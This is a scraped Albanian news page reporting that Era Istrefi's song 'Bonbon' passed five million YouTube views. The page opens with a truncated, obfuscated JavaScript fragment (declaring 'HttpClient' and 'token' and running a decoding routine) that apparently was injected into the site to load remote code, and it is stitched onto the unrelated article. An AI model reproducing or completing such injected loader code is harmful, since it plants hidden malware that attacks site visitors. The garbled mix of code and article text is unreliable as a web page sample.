;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Pesë milionë shikime për ‘Bonbon’

By

Fundi i 2015-tës ishte momenti u shumëpritur kur këngëtarja Era Istrefi erdhi me një projekt solo që pasoi suksesin e pakontestueshëm të duetit ‘Shumë pis’ me Ledrin.

Pritshmëritë ishin mjaft të mëdha dhe duhej punë për të mos zhgënjyer fansat. Dhe nuk kishte se si të ndodhë ndryshe.

‘Bonbon’ u pëlqye shumë duke u shndërruar në një prej refreneve më të kënduara kohëve të fundit.

Me një videoklip të thjeshtë por shumë të bukur, e veçanta Erë bëri sërish diferencën duke dëshmuar se majat e suksesit të kapura shpejt nuk ishin koincidencë.

E reflektim i këtij suksesi janë shikimet në Youtube. Tashmë ‘Bonbon’ ka kaluar 5 milionë shikime dhe për këtë Era ka falemnderuar fansat përmes një postimi në Instagram. /Prive.al

Artikuj të ngjashëm